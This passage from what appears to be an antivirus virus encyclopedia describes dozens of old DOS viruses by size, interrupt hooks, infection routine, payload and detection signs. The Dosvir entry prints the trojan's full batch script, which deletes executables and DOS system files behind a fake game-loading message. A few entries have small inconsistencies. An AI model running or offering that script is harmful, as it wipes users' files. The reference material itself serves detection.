routine. Damage: None Detection Method: File length is 3351 bytes. Notes: 1) Non-memory resident. 2) The virus file is compressed and cannot be recognized without decompression (similar to PKLITE). [Icelandic] Virus Name: Icelandic Other names: Saratoga Virus Type: File Virus Virus Length: 642 bytes (EXE) Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the memory by hooking INT 21h. 2) It then executes the original file. 3) Once memory resident it will infect any uninfected file that is executed. Doesn't infect .COM files. Damage: Infected .EXE files increase by 642 bytes. Note: 1) The virus loads itself resident in the memory. 2) Doesn't hook INT 24h when infecting files. 3) An error message appears if an I/O error (such as write protect) occurs. [Inok-2371] Virus Name: Inok-2371 Virus Type: Parasitic Virus Virus Length: Infected .COM files increase by 2372 bytes (does not infect EXE files) PC Vectors Hooked: None Execution Procedure: Randomly does one of the following: 1) Searches for an uninfected .COM file in the current directory. Infects the file if there is one (infects only one file at a time), and/or executes the host program. 2) Creates a file named ICONKIN.COM in the current directory and then runs it. (It will not infect any files. It will display a small window repeatedly until a key is pressed. And, the small window will show up after a period of time. While the small window is on the screen, everything will be forced to wait.) Infection Procedure: 1) The virus infects files by AH=4B in INT 21h. When an uninfected file is executed, the virus infects it. 2) Lycee hooks INT 24h before infecting files to ignore I/O errors. Damage: Refer to Execution Procedure 2). Detection Method: 1) Check for the small window described in Execution Procedure 2). 2) Infected files increase by 2372 bytes. Remarks: 1) Non-memory resident. 2) When infecting files, the virus does not hook INT 24h. An error message will appear when I/O errors occur. [J-Infect] Virus Name: J-Infect Virus Type: Memory Resident, File Virus (.COM and .EXE files) Virus Length: 12080 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) This is similar to the "JERUSALEM" virus in that it infects the same types of files. Detection Method: Infected files increase by 10280 bytes. [Joanna] Virus Name: JOANNA Aliases: None Virus Type: File Infector Virus Length: 986 bytes Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the memory by hooking INT 21h. 2) It then executes the original file. 3) Once memory resident it will infect any uninfected file that is executed. Detection Method: 1) Virus displays the message "I love you Joanna, Apache...." 2) Infected files increase by 986 bytes. Note: Loads itself resident in the memory. An error message appears if an I/O error (such as write protect) occurs. [July 4] Virus Name: July 4, Stupid 1 Virus Type: File Infector (.COM files) Virus Length: 743 bytes Execution Procedure: 1) If the word at address 0000:01FEh is FFFFh, the virus will not infect any file. Otherwise, it infects all uninfected .COM files on the current directory. If the number of infections is less than 2, it will proceed to infect .COM files on the upper directory until more than two files are infected or until it has reached the root directory. 2) If the current date is July 4 and current time is either 0:00am, 1:00am, 2:00am, 3:00am, 4:00am, or 5:00am, the virus will destroy data on the current diskette. Detection Method: 1) The date and time fields of infected files are changed. 2) The byte at 0003h of an infected .COM file is 1Ah. 3) Infected .COM files display one of the following messages: "Abort, Retry, Ignore, Fail?" , "Fail on INT 24" (2) - "Impotence error reading users disk" (0) - "Program too big to fit in memory" (1) - "Cannot load .COMMAND, system halted" (3) - "Joker!" and "*.com." [K] Virus Name: N1 Virus Type: COM File infector Virus Length: 10230-10240 bytes Execution Procedure: 1) Searches for an uninfected COM file in the current directory, then infects it (only infects one file at a time). 2) It then displays the following message: "This File Has Been Infected By NUMBER One!" Damage: None Note: 1) It does not stay resident in the memory. 2) An error message will appear when writing because INT 24h has not been hanged. Detection Method: 1) Infected files will display the above message when executed. [Kill COM] Virus Name: Killcom Virus Type: File Virus Virus Length: 31648 Bytes PC Vectors Hooked: None Execution Procedure: 1) Looks for COMMAND.COM in the current directory of C:\. 2) If found, corrupts this file. If not, creates a COMMAND.COM file with 213 Bytes. Damage: Corrupts the COMMAND.COM file in the current directory of C:\. Detection Method: None Note: 1) Doesn't stay resident in the memory. 2) Doesn't hook INT 24h when infecting files. An error message appears if there is an I/O error (such as write protect). [LB-Demonic] Virus Name: lb-Demonic Virus Type: File Virus (infects .COM files) Virus Length: No change PC Vectors Hooked: None Execution Procedure: 1) Infects all uninfected .COM files in the current directory. 2) When the file is executed this message appears: "EXEC FAILURE" 3) Checks the system date. If it is Tuesday, the virus renames COMMAND.COM in C:\ to COMMAND.C0M ("O" in .COM changed to "0"). 4) Displays this message: "Error reading drive C:\ ... BillMeTuesday" Damage: 1) Renames COMMAND.COM to COMMAND.C0M, so the system can't start from the disk. 2) Overwrites original files, so infected files won't increase in length. Note: 1) Doesn't stay resident in the memory. 2) Doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Mixer 1A] Virus Name: Mixer 1A Other names: Virus 1618 Virus Type: File Virus Virus Length: Approximately 1618 bytes PC Vectors Hooked: Int 21 Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the memory by hooking INT 21h. 2) It then executes the original file. 3) Once memory resident, it will infect any uninfected file that is executed. Damage: The mixture of characters sent to the serial or parallel port using BIOS functions is the main damage routine of this virus. All bytes sent to the port are translated using the virus' own table. Fifty (50) minutes after the virus is installed into memory, the keyboard routine is activated. From this time on, CapsLock will be set to OFF, and Numlock will be set to ON. The virus will check whether the "Ctrl", "Alt", and "Del" keys are simultaneously depressed. If this is the case, the virus will suppress the "Alt" command and activate a routine for screen manipulation. However, the virus will call the routine in the wrong manner. In text mode, the virus changes all attributes of video page 0. It will add 1 to all attributes and after 256 the virus will reset itself. Sixty (60) minutes after the virus is installed in the memory, it will display a bouncing ball similar to the one seen in the Ping-Pong virus. The ball is marked "o" and its movement is controlled by the BIOS (interrupt 10h). Note: 1) An error message appears if there is an I/O error (such as write protect). [Multi-2B] Virus Name: Multi-2-B Virus Type: File Virus (infects .COM and .EXE files) and Partition Table Infector Virus Length: 927 Bytes (COM files), about 1000 Bytes (EXE files) PC Vectors Hooked: INT 21h, INT 24h, INT 1Ch, INT 13h Execution Procedure: 1) When you execute an infected file, the virus infects Sector #1 (if not yet infected) of the hard disk. 2) Checks whether it is memory resident. If not, it infects Sector #1 and then exits. If it is, executes the original program. Damage: None Detection Method: Infected files increase by 927-1000 Bytes. Note: 1) Multi-2 hooks INT 24h when infecting files. 2) Omits I/O errors (such as write protect). [Necro-B] Virus Name: Necro-B Virus Type: File Virus (infects .EXE and .COM files) Virus Length: 696 Bytes (COM and EXE) PC Vectors Hooked: None Execution Procedure: 1) Searches for uninfected .COM and .EXE files in the current directory, and infects them three files at a time. Damage: None Detection Method: 1) Infected files increase by 696 Bytes. Note: 1) Doesn't stay resident in the memory. 2) Doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). 3) Infected files can't execute or infect other files. [No Wednesday] Virus Name: NO-WEDNESDAY Virus Type: File Virus (infects .COM files) Virus Length: 520 Bytes (COM) PC Vectors Hooked: INT 24h Execution Procedure: 1) Searches for uninfected COM files in the current directory and infects them one at a time. 2) Displays the message: "file not found." Damage: Infected files can not execute original file. Detection Method: 1) Infected files increase by 520 Bytes. 2) "file not found" message appears on the screen. Note: 1) Doesn't stay resident in the memory. 2) Hooks INT 24h when infecting files. Omits I/O error (such as write protect). [Prudent] Virus Name: Prudent Other names: 1210 Virus Type: File Virus Virus Length: 1210 bytes (EXE files) Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the memory by hooking INT 21h. 2) It then executes the original file. 3) Once memory resident it will infect any uninfected file that is executed. Doesn't infect .COM files. Damage: Overwrites original files. Detection Method: From May 1-4, the virus will frequently check the disk, thus causing abnormal disk activity. Note: 1) Loads itself resident in the memory. 2) An error message appears if there is an I/O error (such as write protect). [Sandwich] Virus Name: SANDWICH Virus Type: Highest Memory Resident, File Virus (infects .COM files) Virus Length: 1172 Bytes (COM) PC Vectors Hooked: INT 21h, AX=4B00h (execute program) Infection Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the memory by hooking INT 21h. 2) It then executes the original file. 3) While memory resident it infects any uninfected file that is executed. Doesn't infect .EXE files. Damage: None Detection Method: Infected files increase by 1172 Bytes. Note: The Sandwich virus doesn't hook INT 24h when infecting files. An error message appears if there is an I/O error (such as write protect). [Scythe-2d] Virus Name: Scythe-2d Virus Type: Boot Virus PC Vectors Hooked: INT 13h Execution Procedure: 1) Modifies the memory size, decreasing the real memory size by 1K. 2) Installs itself resident in the memory (in the last 1K of the memory). 3) Hooks INT 13h. 4) Returns the control to DOS and the system boots normally. Damage: None Note: 1) When booting the system with a floppy disk, the virus will first check whether the hard disk is infected. If not, the virus will infect it. 2) INT 13h: checks for any request for the contents of the boot sector or partition table. If such request exists, the virus will return the uninfected, original data. [Sunday] Virus Name: Sunday Other Names: None Virus Type: Boot Strap Sector Virus (Memory Resident) Virus Length: 1636 bytes Damage: The infected system becomes unusable every Sunday. Detection Method: Every Sunday, the virus displays the following message: "Today is Sunday! Why do you work so hard? All work and no play makes you a dull boy! Come on! Let's go out and have some fun!" [The Silence of the Lamb!] Virus Name: The Silence Of The Lamb! Virus Type: Memory Resident, File Virus (COM files) Virus Length: 555 bytes PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is still in the last memory block. If not, it stays resident in the high memory and returns to the original routine. Infection Procedure: 1) Encodes the first 200h bytes of the original file. 2) Attaches them and the decoded codes at the end of the file. 3) Encodes the virus code and writes them onto the first 200h bytes of the file. Damage: None Notes: 1) Hooks INT 21H (AH=4Bh) to infect files. 2) Hangs INT 24h to prevent divulging its trace when writing, then checks whether the program to be executed is an uninfected COM file (length must be between 0400h and FA00h bytes). If it is, the virus infects it. Lastly, the virus restores INT 24h. 3) Date and time fields of infected files are not changed. Detection Method: 1) Call INT21h (AH=2Dh,CH=FFh,DH=FFh) to return the value of AH. If AH=00h, the memory is infected. If AH=FFh, the memory is not infected. 2) If the word at address 0002 of the COM file is 5944h, the memory is infected. After the virus code has been decoded, there will be a text in 01E6h-01EFh that reads: " The Silence Of The Lamb!$" 3) Total memory decreases by 1568 bytes. [USSR] Virus Name: USSR Other Names: 570, 8-17-88, 2:08a Virus Type: Parasitic Virus Virus Length: 570 bytes Symptom: 1) Infects .EXE files. Increases file size by 570 to 585 (570+15) bytes. (The next multiple of 16 of the original file size plus 570). 2) The date and time fields in the file's directory entry is set to 8-17-88 and 2:08a. Damage: Writes one sector to the boot sector of the C drive, then halts the system. [Vacsina-V16h] Virus Name: Vacsina V16h Other Names: Virus 1339 Virus Type: Parasitic Virus, RAM resident Virus Length: Approximately 1339 bytes Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the memory by hooking INT 21h. 2) It then executes the original file. 3) While memory resident, the virus infects any uninfected file that is executed. Damage: The virus modifies the Ping-Pong virus in the memory. The virus changes two bytes, jumps, and adds one subroutine. It is interesting that the Ping-Pong virus is ready to change in this manner. After 255 reboots, the infected disk is deactivated in the memory, returning the original interrupt vector to 13h with the value of 0:413h. The virus proceeds to play the "Yankee Doodle" song. Note: Loads itself resident in the memory. An error message appears if there is an I/O error (such as write protect). [VCL-2-B] Virus Name: Vcl-2-B Virus Type: File Virus (infects .COM files) Virus Length: 663 Bytes(COM) PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM file in the current directory. 2) Once it locates a file it checks whether it has been infected by VCL-2. If it has, it continues to look for any uninfected .COM file. 3) It only infects two files at a time. Damage: None Detection Method: 1) Infected files increase by 663 Bytes. Note: 1) Doesn't stay resident in the memory. 2) Doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). [Violator] Virus Name: Violator Other Names: Violator Strain B, Violator BT Virus Type: File Virus Virus Length: 1055 bytes (COM files) Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the memory by hooking INT 21h. 2) It then executes the original file. 3) While memory resident the virus infects any uninfected file that is executed. Doesn't infect .EXE files. Damage: If the system date is after Aug 15, 1990, the virus will format the first cylinder of the current drive. Detection Method: 1) Infected .COM files increase by 1055 bytes. Note: 1) Loads itself resident in the memory. 2) An error message appears if there is an I/O error (such as write protect). [Virus 9] Virus Name: Virus9 Virus Type: File Virus (infects .COM files) Virus Length: 256 Bytes (COM files) PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM file in the current directory. 2) It infects all uninfected files until all files in the current and the "mother" directories are infected. Damage: None Detection Method: Infected files increase by 256 Bytes. Note: 1) Doesn't stay resident in the memory. 2) Doesn't hook INT 24h when infecting files. Error message appears if there is an I/O error (such as write protect). 3) The virus does not reinfect. [WinWORD_Nuclear] Virus Name: WinWORD_Nuclear Virus Type: File Virus Virus Length: N/A Description: This virus infects MSWORD documents. When an infected document is opened, the virus goes resident by adding some macros to your WORD environment. The virus also runs a macro called PayLoad which wipes out your DOS system files on the 5th of April. Once the virus is active, all documents saved using the "Save As..." command will be infected. Occasionally, printed documents will have the following two lines of text added: "And finally I would like to say: STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC" The virus may also try to inject a DOS file virus "Ph33r" into your system. [Wit Code] Virus Name: WITCODE Other names: None Virus Type: File Virus Virus Length: 965/975 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the memory by hooking INT 21h. 2) It then executes the original file. 3) Once memory resident it infects any uninfected file that is executed. Damage: None Detection Method: Increases infected file size by 965/975 bytes Note: 1) Loads itself resident in the memory. 2) An error message appears if there is an I/O error (such as write protect). [XQR-B] Virus Name: XQR-B Virus Type: File Virus (infects .COM and .EXE files) and Partition Table Infector Virus Length: No change PC Vectors Hooked: INT 21h, INT 24h, INT 13h, INT 8h Execution Procedure: 1) When you execute an infected file, the virus infects Sector #1. 2) Checks whether it is memory resident. If not, it loads itself resident in the memory by hooking INT 21h, INT 8h, and INT 13h. 3) If the system date is May 4, the virus displays this message: " XQR: Wherever, I love you Forever and ever! The beautiful memory for ours in that summer time has been recorded in Computer history . Bon voyage, My dear XQR! " 4) Infects every uninfected file that is executed. Damage: The virus changes the keyboard configuration every Sunday. Detection Method: Check whether or not the keyboard is working properly. Note: 1) Hooks INT 24h when infecting files. It omits I/O errors (such as write protect). [Yonyu] Virus Name: YONYU Virus Type: Boot Sector and Partition Infector Virus Length: None. PC Vectors Hooked: INT 13h Execution Procedure: 1) The virus decreases, by 1K bytes, the total memory when the system is booted from an infected disk. 2) It loads itself resident into the last 1K bytes of the memory. 3) Hooks INT 13h. 4) Infects the diskette. Damage: None Detection Method: Decreases total memory by 1K Bytes. Note: 1) Doesn't hook INT 24h when infecting files. It omits I/O errors (such as write protect). [Gorlovka] Virus Name: Gorlovka Virus Type: Memory resident, File Virus (COM and EXE files) Virus Length: PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it resides in the memory. If it is, the virus displays the following message: "Tracing mode has been destroyed." Otherwise, it loads itself resident in the high memory. 2) Hooks INT 21h and then displays: "Tracing mode has been destroyed." Infection Procedure: Hooks INT 21H(AH=4Bh). First, it will hang INT 24h to prevent divulging its trace when writing, then checks whether the program to be executed is an uninfected COM or EXE file. If it is, the virus proceeds to infect it. Lastly, the virus restores INT 24h. Damage: The virus overwrites the original files with the virus code, thus corrupting them. Note: Infected file sizes are not changed. Detection Method: Check for the above message. [Akuku-649] Virus Name: Akuku-649 Virus Type: File Virus (COM files) Virus Length: 649 bytes Execution Procedure: 1) Searches for all uninfected COM files on the current directory (it does not infect the same file twice) and then proceeds to infect them. 2) No matter whether it has infected files or not, it will check whether the current calendar year is greater than 1994, the current month is greater than 6, the current day is greater than 6, and the current time is after 15:00. If all these conditions are met, the virus displays the following message: "A kuku frajerze." Damage: None Note: 1) Does not stay in the memory. 2) Before infecting files, it will hang INT 24h to prevent divulging its trace when writing. Detection Method: Infected files increase by 649 bytes. [Cossiga] Virus Name: Cossiga Virus Type: File Virus (EXE files) Virus Length: Execution Procedure: 1) Searches for an uninfected EXE file on the current directory, and then infects it (only infects one file at a time). 2) No matter whether it has infected files or not, it will check whether the current date is after 10/17/1991. If it is, the virus displays the following message: "COSSIGA ?! NO GRAZZIE ! By Amissi dee Panoce (c) 1991 " Damage: It overwrites the original files with the virus code, thus corrupting the files. Note: 1) Does not stay in the memory. 2) An error message appears when writing because INT 24h has not been hanged. [DOS Vir] Virus Name: Dosvir Virus Type: TROJAN Virus Length: 3004 bytes Execution Procedure: 1) The virus creates a batch file with the following commands: CLS echo Cracked by Cracking Kr .e 20 2 echo Loading game. .Please Wait.... c: CD\ DEL autoexec.bat DEL *.exe DEL *.com DEL *.exe DEL *.com DEL *.sys ATTRIB..-r ibmbio.com ATTRIB..-r ibmdos.com ATTRIB..-r ibmbio.sys ATTRIB..-r ibmdos.sys DEL ibmbio.com DEL ibmdos.com DEL ibmbio.sys DEL ibmdos.sys CD\bbs DEL *.exe DEL *.com CD\dos DEL *.exe DEL *.com d: CD\ DEL autoexec.bat DEL *.exe DEL *.com CD\dos DEL *.exe DEL *.com CD\bbs DEL *.exe DEL *.com CLS 2) Executes the batch file. [Deranged] Virus Name: Deranged Virus Type: File Virus (EXE files) Virus Length: 419 bytes Execution Procedure: 1) Searches for all uninfected EXE files on the current directory, and then proceeds to infect them. Damage: None Note: 1) Because the virus procedure is not well written, the system halts when an infected file is executed. 2) Does not stay in the memory. 3) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 419 bytes. [James] Virus Name: James Virus Type: File Virus (COM files) Virus Length: 356 bytes PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to original routine. Infection Procedure: Hooks INT 21H (AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing, then checks whether the program to be executed is an uninfected COM file. If it is, the virus proceeds to infect it. Lastly, the virus restores INT 24h. Damage: None Detection method: Infected files increase by 356 bytes. [Abraxas-3] Virus Name: Abraxas-3 Virus Type: File Virus (EXE files) Virus Length: 1200 bytes Execution Procedure: 1) The virus plays the song "Do Re Mi Fa So La Si Do Re......". 2) Displays the message: "abraxas" in enlarged font. 3) Searches for an uninfected EXE file on the current directory and proceeds to infect it (only infects one file at a time). The method of infection is: it creates a file with the same name as the original file, and its length is 1200 bytes. Damage: The virus overwrites the original files with the virus code, thus corrupting them. Detection Method: Infected file length is 1200 bytes. [Wolfman] Virus Name: Wolf-Man Virus Type: Memory Resident, File Virus (COM and EXE files) Virus Length: 2064 bytes PC Vectors Hooked: INT 09h, INT 10h, INT 16h, INT 21h Execution Procedure: 1) Checks whether it remains resident in the memory. If not, it loads itself resident into the memory. 2) Checks whether the current calendar day is 15. If it is, the virus will manifest itself. Otherwise, it will hook INT 09H, INT 10H, INT 16H, and INT 21H, then it will go back to the original routine. Infection Procedure: 1) Hooks INT 21H to infect files. It checks whether the program to be executed is an infectable file (except COMMAND.COM), and then proceeds to infect it (the infectable file length must be larger than 1400 bytes). 2) Hooks INT 9h and INT 10h to check for a change in the program. If there is, the virus will manifest itself. Symptoms: Displays a message. Overwrites the current diskette with the virus code until there is no more free space left. Delays 30 seconds and then proceeds to reboot the system. Damage: Destroys all data on the current diskette. Note: 1) Procedure for displaying the virus message is designed for the Herc display card. Therefore, the system will halt if the virus is run on a color display card. This, in turn, can prevent destruction of the hard disk. 2) Virus procedure contains the text : "WOLFMAN" Detection Method: 1) Infected files increase by 143 bytes. 2) Use MEM.EXE to check whether an executed program remains resident in the memory (it will occupy approximately 65.6K bytes). [Cuban] Virus Name: Cuban Virus Type: File Virus (COM files) Virus Length: 1501 bytes PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to original routine. 3) Checks whether the current calendar day is 30. If it is, the virus proceeds to destroy all data on the hard disk. Infection Procedure: 1) Hooks INT 21H (AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected COM file, the virus infects it directly. If the program to be executed is an EXE file, it will search for an unfixed COM file and infect this COM file. 2) Restores INT 24h. Damage: The virus sometimes destroys all data on the hard disk. Detection Method: Infected files increase by 1501 bytes. [Darkend] Virus Name: Darkend Virus Type: File Virus (EXE files) Virus Length: 1188 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to original routine. 3) Checks whether the current date is October 15. If it is, the virus destroys all data on the hard disk. Infection Procedure: 1) Hooks INT 21H (AH=4Bh) to infect files. If the program to be executed is an uninfected EXE file, the virus proceeds to infect it directly. Damage: The virus sometimes destroys all data on the hard disk. Detection method: Infected files increase by 1188 bytes. [Story-A] Virus Name: Story-A Virus Type: File Virus (COM files) Virus Length: 1117 bytes PC Vectors Hooked: INT 08h Execution Procedure: 1) Searches for three (3) uninfected COM files (excluding COMMAND.COM) in the root directory and all subdirectories, and then infects them (does not infect the same file twice). 2) Holds the order of every infected file. 3) Checks if the order of the current infected file is larger than 7, or if the current date is July 9. If one of these two conditions is met, the virus will activate. Symptoms: Does not execute infection procedure, stays resident in the memory. Then hooks INT 08h. 290 seconds later, a message appears repeatedly (in 22-second cycles) in inverse mode. Note: Date and time fields of infected files are not changed. Detection Method: 1) Memory: a) Total system memory decreases. b) Virus might be triggered if the first 4 bytes of the segment (before free memory) are FFh, 26h, 04h and 01h. 2) File: a) Infected files increase by 1117 bytes. b) First 4 bytes of infection are FFh, 26h, 04h and 01h. [Story-B] Virus Name: Story-B Virus Type: File Virus (COM files) Virus Length: 1168 bytes PC Vectors Hooked: INT 08h Execution Procedure: 1) Searches for three (3) uninfected COM files (excluding COMMAND.COM) in the root directory and all subdirectories, and then infects them (does not infect the same file twice). 2) Holds the order of infected files. 3) Checks if the order of the current infected file is larger than 7, or whether the current month is December. If one of these two conditions is met, the virus will activate. Symptoms: Does not execute infection procedure, stays resident in the memory. Then hooks INT 08h. 290 seconds later, a message appears repeatedly (in 22-second cycles) in inverse mode. Note: Date and time fields of infected files are not changed. Detection method: 1) Memory: a) Total system memory decreases. b) Virus might be triggered if the first 4 bytes of the segment (before free memory) are FFh, 26h, 04h and 01h. 2) File: a) Infected files increase by 1168 bytes. b) First 4 bytes of infection are FFh, 26h, 04h and 01h. [MS DOS 3.0] Virus Name: Ms-Dos3.0 Virus Type: File Virus (COM files) Virus Length: 953 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and returns to the original routine. Infection Procedure: 1) Hooks INT 21H (AH=3Dh,AX=4B00h) to infect files. If the program to be executed or opened is an uninfected COM file (except COMMAND.COM) and its length is not larger than FB00h, the virus proceeds to infect it. The method of infection is: it writes a total of 35Dh bytes (1Ch bytes for the head, first 3B9h bytes of the file) at the end of the file, then overwrites its first 3B9h bytes with the virus code. If the program to be executed or opened is an uninfected EXE file and its length is not larger than 4000h, the virus infects it. The method of infection is: after filling the left bytes of the segment, it will attach a total of 3F1h bytes (virus codes(3B9h)+data in original file(1Ch)+head offile(1Ch)) at the end of the file, then change the pointer to point to the virus procedure. Damage: None Note: 1) Date and time fields of infected files are not changed. 2) Stealth type virus: restores infected file information while the virus is memory resident. Detection method: 1) Memory: a) Total system memory decreases by 7A0h bytes. b) Memory might be infected if AX=9051h (AX is the returned value when INT 21h(AH=B3h) is called). 2) File: a) Infected COM files increase by 500 bytes. b) Infected EXE files increase by 1009-1024 bytes. c) Use DEBUG to load an infected file. [Evilgen] Virus Name: Evilgen Virus Type: File Virus (COM and EXE files) Virus Length: 955 bytes (Version 1.1), 963 bytes (Version 2.0) PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and INT 09h and goes back to the original routine. 3) Checks if the current day is 24 and if the "Del" key is depressed. If so, the virus will activate. Infection Procedure: 1) Hooks INT 21H(AX=4B00h) to infect files. If the program to be executed is an uninfected EXE or COM file, the virus proceeds to infect it. 2) Hooks INT 09h to check whether the "Del" key is depressed. Symptom: Selects a sector on the C drive, then formats the sector from head 0, track 0 to head 0, track 20h. Damage: The virus sometimes destroys the C drive. Note: 1) Date and time fields of infected files are not changed. 2) While memory resident, typing " Dir" will not display the change in the sizes of infected files. Detection method: 1) Memory: a) Total system memory decreases. b) COMMAND.COM on the root directory of C is infected if BX=9051h (BX is the returned value when INT 21h(AX=7BCDh) is called). c) The pointers of INT 21h and INT 09h are the same. 2) File: Infected files increase by 955 bytes (Version 1.1) or 963 bytes (Version 2.0.). These changes are only apparent if the virus is not memory resident. [Decide-2] Virus Name: Decide-2 Virus Type: File Virus (COM files) Virus Length: 1335 bytes Execution Procedure: 1) Searches for an uninfected COM file on the current directory, and then infects it (only infects one file at a time). 2) No matter whether it has infected a file or not, it will check whether the current calendar month is September or October, and the current day is between 3 and 18. If it is, the virus displays the following: "As the good times of DECIDE will be remembered, I started to make a new virus. You are not facing the dark tombs of "Morgoth". Humble regards to : Pazuzu, Kingu, Absu Mummu Tiamat, Baxaxaxa Baxaxaxa, Yog Sothoth Iak Sakkath, Kutulu, Humwawa Xaztur, Hubbur Shub Niggurath. Also my lovely regards go to Stephanie, the only one who makes my heart beat stronger. Want to make love with a Moribid Angel? Glenn greets ya. Press a key to start the program..." Damage: None Note: 1) Does not remain in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 1335 bytes. [ED] Virus Name: Ed Virus Type: File Virus (COM and EXE files) Virus Length: 775-785 bytes PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory by hooking INT 21h. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected COM or EXE file, the virus proceeds to infect it. Damage: There is a flag in the virus procedure (every infected file has a different flag). The flag decreases by 1 every time the virus infects a new file. When the flag reaches zero, the virus will destroy all data on the hard disk. Detection method: Infected files increase by 775-785 bytes. [Dima] Virus Name: Dima Virus Type: File Virus (COM and EXE files) Virus Length: 1024 bytes PC Vectors Hooked: INT 24h Execution Procedure: Searches for all uninfected COM and EXE files on all directories, and infects them. Hooks INT 24H to prevent divulging its trace when writing. Detection method: Infected files increase by 1024 bytes. [Digger] Virus Name: Digger Virus Type: File Virus (COM and EXE files) Virus Length: 1472-1482 bytes Execution Procedure: Searches for an uninfected COM or EXE file on the current directory, and then infects it (does not reinfect). Damage: None Note: 1) Does not stay in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection Method: Infected files increase by 1472-1482 bytes. [FVHS] Virus Name: Fvhs Virus Type: File Virus (COM and EXE files) Virus Length: Execution Procedure: Searches for an uninfected COM or EXE file on the current and parent directories, then infects it. It infects three files at a time. Damage: It overwrites the original files with the virus code, thus corrupting the files. Note: 1) Does not stay in the memory. 2) An error message appears when writing because INT 24h has not been hanged. [Egg] Virus Name: Egg Virus Type: File Virus (EXE files) Virus Length: 1000-1005 bytes PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected EXE file, the virus proceeds to infect it. Damage: None Detection method: Infected files increase by 1000-1005 bytes. [Freddy] Virus Name: Freddy Virus Type: File Virus (EXE and COM files) Virus Length: 1870-1880 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed is an uninfected COM or EXE file, the virus proceeds to infect it. The virus sometimes searches concurrently for other uninfected files to infect. Damage: None Note: An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 1870-1880 bytes. [Ninja] Virus Name: Ninja Virus Type: File Virus (EXE and COM files) Virus Length: 1511 or 1466 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. 3) Checks whether the current calendar year is 1992, current day is 13, and current time is 13:00. If these conditions are met, the virus proceeds to destroy all data on the hard disk. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed is an uninfected EXE or COM file, the virus infects it. Damage: The virus sometimes destroys all data on the hard disk. Detection method: Infected files increase by 1511 or 1466 bytes. [Yan-2505A] Virus Name: Yan2505a Virus Type: File Virus (EXE and COM files) Virus Length: 2505 bytes PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and returns to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected COM or EXE file, the virus proceeds to infect it. Damage: None Detection method: Infected files increase by 2505 bytes. [Suicide] Virus Name: Suicide Virus Type: File Virus (COM and EXE files) Virus Length: 2048 bytes Execution Procedure: Searches for uninfected COM and EXE files on the current directory, and then infects them. It infects four files at a time. Damage: None Note: 1) Does not stay in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection Method: Infected files increase by 2048 bytes. [4915] Virus Name: 4915 Virus Type: File Virus (EXE files) Virus Length: Execution Procedure: Searches for all uninfected EXE files on the current directory in A, and then proceeds to infect them. Damage: It overwrites the original files with the virus code, thus corrupting the files. Note: 1) Does not stay in the memory. 2) An error message appears when writing because INT 24h has not been hanged. 3) This virus was written using an advanced programming language. [MSJ] Virus Name: Msj Virus Type: File Virus (EXE and COM files) Virus Length: 15395 bytes Execution Procedure: Searches for an uninfected EXE file on the current directory in A, B or C, then proceeds to infect it. It only infects one file at a time. Damage: None Note: 1) Does not stay in the memory. 2) An error message appears when writing because INT 24h has not been hanged. 3) This virus was written using an advanced programming language. Detection method: Infected files 